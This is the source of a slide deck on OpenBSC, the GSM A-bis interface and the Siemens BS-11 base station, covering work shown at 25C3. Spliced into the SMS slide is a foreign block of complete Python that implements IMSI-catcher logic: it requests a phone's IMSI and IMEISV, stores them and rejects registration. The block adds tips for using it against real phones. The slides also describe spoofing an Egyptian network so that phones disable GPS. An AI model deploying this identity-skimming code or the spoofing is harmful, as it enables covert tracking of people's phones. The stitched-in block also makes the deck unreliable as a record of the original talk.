%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
GSM A-bis interface

BSC <-> BTS Interface
	is called A-bis
	has the following control layers on E1 TS1
		L2ML (Layer 2 Management Link)
			TEI management similar to ISDN
		OML (Operation & Maintenance Link)
			System parameters, events
		RSL (Radio Signalling Link)
	has encoded voice data (TRAU frames) on the other E1 timeslots
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The Siemens BS-11 microBTS

Siemens BS-11 microBTS
	plain old 2G (GSM voice calls, CSD)
	one or two TRX, 30mW to 2W each, GSM900
	two E1 interfaces (for daisy-chaining)
	documentation under NDA, but 99.9% of the A-bis protocol is available from the GSM specs
		See TS 04.08 (layer 3: RR/MM/CC), 12.21 (OML), 08.58 (RSL)
	RS232 serial port for the Local Maintenance Terminal
		LMT software proprietary under NDA
		not needed for operation of the BTS
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The Siemens BS-11 microBTS

%image "1_small.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The Siemens BS-11 microBTS

First steps with the Siemens BS-11
	Harald bought a BS-11 on eBay in 2006
	Started to read some specs (08.5x) about A-bis
	Started to build cables for E1 and power
	Bought an HFC-E1 PCI card
	Bought an Elmi EGM35 A-bis analyzer (eBay once again)
	Contacted other people who also bought a BS-11
	Found somebody who could provide A-bis traces
	Never really had time due to Openmoko and other projects
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
OpenBSC

OpenBSC (12/2008)
	get L2ML to work with mISDN
		mainline mISDN doesn't deal with multiple SAPIs and a fixed TEI
		learn how the new sockets-based mISDN API works
	come up with an event-driven architecture, single select loop, no threads, ...
	At 25C3:
		add libdbi/sqlite database for the "HLR"
		get paging to work, support for configurable network ID
		debugging + stabilization with > 1000 test users ;)
		IMSI + IMEI skimming
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Work at 25C3

IMSI+IMEI skimming
	very simple: phones with automatic network selection pick the strongest network
	they send LOCATION UPDATING REQUEST
	we send IDENTITY REQUEST for IMSI + IMEISV
	they send IMSI + IMEISV
	we store this in the database and then send LOCATION UPDATING REJECT
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Work at 25C3

Mobile Originated Call
	once an MS is registered, we can dial a number from the MS
	allocate and establish a TCH/F
	deal with the signalling and get into Connect
	unfortunately, the code for handling voice streams is not finished
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Work at 25C3

Mobile Originated SMS
	once an MS is registered, we can send an SMS
	parse + acknowledge SMS PDU data
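The skimming exchange on the "Work at 25C3" slide, written out as the GSM 04.08 mobility-management messages it consists of. This is an added example, not OpenBSC code: a small BSC/MSC-side handler that asks for IMSI and IMEISV, stores them and answers LOCATION UPDATING REJECT, plus a simulated phone on the other side. The IMSI, IMEISV, TMSI, the old LAI (MCC 602, i.e. an Egyptian PLMN, so the same LAI decoder shows what the "Egypt detection" on the next slide keys on), the classmark octet and the choice of reject cause are all constructed values; the Mobile Identity and LAI encodings follow 04.08 sections 10.5.1.4 and 10.5.1.3.

```python
"""The IMSI/IMEISV skimming exchange as GSM 04.08 MM messages.
Added example, not OpenBSC code; identities, TMSI, LAI and classmark values are constructed."""

PD_MM = 0x05                                  # protocol discriminator: mobility management
MT_LU_REQUEST, MT_LU_REJECT = 0x08, 0x04
MT_ID_REQUEST, MT_ID_RESPONSE = 0x18, 0x19
ID_IMSI, ID_IMEI, ID_IMEISV, ID_TMSI = 1, 2, 3, 4
CAUSE_ROAMING_NOT_ALLOWED_IN_LA = 0x0D        # reject cause #13; a constructed choice
CLASSMARK1 = 0x33                             # constructed: phase 2 MS, A5/1, power class 4

def encode_mi(id_type, ident):
    """Mobile Identity IE (04.08 10.5.1.4) as length + value: BCD digits, low nibble first;
    bit 4 of the first octet flags an odd digit count, an even count is padded with 0xF."""
    if id_type == ID_TMSI:
        return bytes([5, 0xF0 | ID_TMSI]) + bytes(ident)
    odd = len(ident) % 2
    body = [(int(ident[0]) << 4) | (odd << 3) | id_type]
    for i in range(1, len(ident), 2):
        hi = int(ident[i + 1]) if i + 1 < len(ident) else 0xF
        body.append(int(ident[i]) | (hi << 4))
    return bytes([len(body)] + body)

def decode_mi(buf):
    """Parse a length-prefixed Mobile Identity; returns (type, digits or TMSI as hex)."""
    body = buf[1:1 + buf[0]]
    id_type = body[0] & 0x7
    if id_type == ID_TMSI:
        return id_type, body[1:5].hex()
    digits = [str(body[0] >> 4)]
    for b in body[1:]:
        digits += [str(b & 0xF), str(b >> 4)]
    if not body[0] & 0x8:                     # even digit count: drop the 0xF filler
        digits.pop()
    return id_type, "".join(digits)

def encode_lai(mcc, mnc, lac):
    """Location Area Identification (10.5.1.3): MCC/MNC as BCD, a 2-digit MNC pads with 0xF."""
    mnc3 = int(mnc[2]) if len(mnc) == 3 else 0xF
    o = [int(mcc[0]) | int(mcc[1]) << 4, int(mcc[2]) | mnc3 << 4, int(mnc[0]) | int(mnc[1]) << 4]
    return bytes(o) + lac.to_bytes(2, "big")

def decode_lai(b):
    mcc = f"{b[0] & 0xF}{b[0] >> 4}{b[1] & 0xF}"
    mnc = f"{b[2] & 0xF}{b[2] >> 4}" + ("" if b[1] >> 4 == 0xF else str(b[1] >> 4))
    return mcc, mnc, int.from_bytes(b[3:5], "big")

class SkimmingBsc:
    """Network side: ask for IMSI and IMEISV, store them, then reject the location update."""
    def __init__(self):
        self.db = {}          # IMSI -> {'imeisv', 'old_lai'}
        self.pending = {}     # connection -> partially collected record

    def handle(self, conn, msg):
        """Return the downlink MM message to send on this connection, or None."""
        if msg[0] & 0x0F != PD_MM:
            return None
        mt = msg[1] & 0x3F                    # bit 7 of MS-originated MM messages is N(SD)
        if mt == MT_LU_REQUEST:               # octets: PD, MT, LU type/CKSN, LAI(5), CM1, MI
            rec = self.pending[conn] = {"old_lai": decode_lai(msg[3:8])}
            id_type, ident = decode_mi(msg[9:])
        elif mt == MT_ID_RESPONSE and conn in self.pending:
            rec = self.pending[conn]
            id_type, ident = decode_mi(msg[2:])
        else:
            return None
        if id_type in (ID_IMSI, ID_IMEISV):   # phones usually send a TMSI first, so we have to ask
            rec[{ID_IMSI: "imsi", ID_IMEISV: "imeisv"}[id_type]] = ident
        for want, key in ((ID_IMSI, "imsi"), (ID_IMEISV, "imeisv")):
            if key not in rec:
                return bytes([PD_MM, MT_ID_REQUEST, want])
        self.db[rec.pop("imsi")] = rec
        del self.pending[conn]
        return bytes([PD_MM, MT_LU_REJECT, CAUSE_ROAMING_NOT_ALLOWED_IN_LA])

class FakeMs:
    """A phone that carries a TMSI from its previous network and answers identity requests."""
    def __init__(self, imsi, imeisv, tmsi, old_lai):
        self.imsi, self.imeisv, self.tmsi, self.old_lai, self.nsd = imsi, imeisv, tmsi, old_lai, 0

    def _send(self, msg):                     # set N(SD) in the message type octet, then toggle it
        out = bytes([msg[0], msg[1] | self.nsd << 6]) + msg[2:]
        self.nsd ^= 1
        return out

    def lu_request(self):
        head = bytes([PD_MM, MT_LU_REQUEST, 7 << 4 | 0])   # CKSN 7 = no key, type 0 = normal
        return self._send(head + encode_lai(*self.old_lai) + bytes([CLASSMARK1]) + encode_mi(ID_TMSI, self.tmsi))

    def answer(self, dl):
        if dl[1] != MT_ID_REQUEST:
            return None                       # LOCATION UPDATING REJECT: nothing more to say
        ident = {ID_IMSI: (ID_IMSI, self.imsi), ID_IMEISV: (ID_IMEISV, self.imeisv)}.get(dl[2] & 0x7)
        return self._send(bytes([PD_MM, MT_ID_RESPONSE]) + encode_mi(*ident)) if ident else None

def run_exchange(ms, bsc, conn=1):
    """Drive one MS through the BSC; returns the list of (direction, message) pairs."""
    trace, ul = [], ms.lu_request()
    while ul is not None:
        trace.append(("MS->BSC", ul))
        dl = bsc.handle(conn, ul)
        if dl is None:
            break
        trace.append(("BSC->MS", dl))
        ul = ms.answer(dl)
    return trace

if __name__ == "__main__":
    bsc = SkimmingBsc()
    ms = FakeMs("262010123456789", "3512340012345601", bytes.fromhex("deadbeef"), ("602", "01", 0x2A5C))
    for direction, msg in run_exchange(ms, bsc):
        print(direction, msg.hex())
    print(bsc.db)
```

Two details matter when doing this against real phones rather than the simulated one: the phone normally identifies itself with the TMSI its last network assigned, which is why the IDENTITY REQUEST for the IMSI is needed at all, and MS-originated MM messages carry the send sequence number N(SD) in bit 7 of the message type octet, so a dispatcher that compares the raw octet will miss every second message.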
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Work at 25C3

The Egypt simulation
	apparently GPS is illegal in mobile phones in Egypt
	"Egypt detection" implemented by checking if any surrounding cells carry the Egyptian country code
		phones don't even have to register to our BTS!
	so if we claim to be e.g. MobiNil, phones will shut off their GPS
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Other GSM related FOSS

Other GSM related FOSS
	OpenBTS
		100% Software Defined Radio based on USRP + gnuradio
		implements the entire RF + layer 1/2/3 and interfacing to SIP/Asterisk
		much more than just a BTS!!
		some code overlap with OpenBSC
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Other GSM related FOSS

THC GSM project
	now converging into airprobe.org
	working on a protocol analyzer / sniffer for the GSM Um air interface
	slow progress, only few people understand the technology
	but it's actually not all that hard, just needs time and motivation
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Links

OpenBSC
	http://openbsc.gnumonks.org/
3GPP / ETSI GSM Specs
	http://www.3gpp.org/
Priv-Doz. Dr.-Ing Joachim Goeller
	http://www2.informatik.hu-berlin.de/~goeller
THC GSM Wiki
	http://wiki.thc.org/gsm
OpenBTS
	http://gnuradio.org/trac/wiki/OpenBTS
Harald's branch of gsm-tvoid, etc
	git://git.gnumonks.org/gsm.git
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Thanks

Thanks to
	The FSF and Richard Stallman for the GPL
		which e.g. enabled us to get the kernel source for the EZX phones
	Openmoko, Inc. for their work on Freeing the mobile world
	The ETSI/3GPP for having all their specifications online
	zecke, alphaone, Stefan for their work on OpenBSC
	W. for his extensive A-bis protocol traces and MA-10
	Netzing AG for funding my OpenBSC work
	Pablo for inviting me to this conference in Seville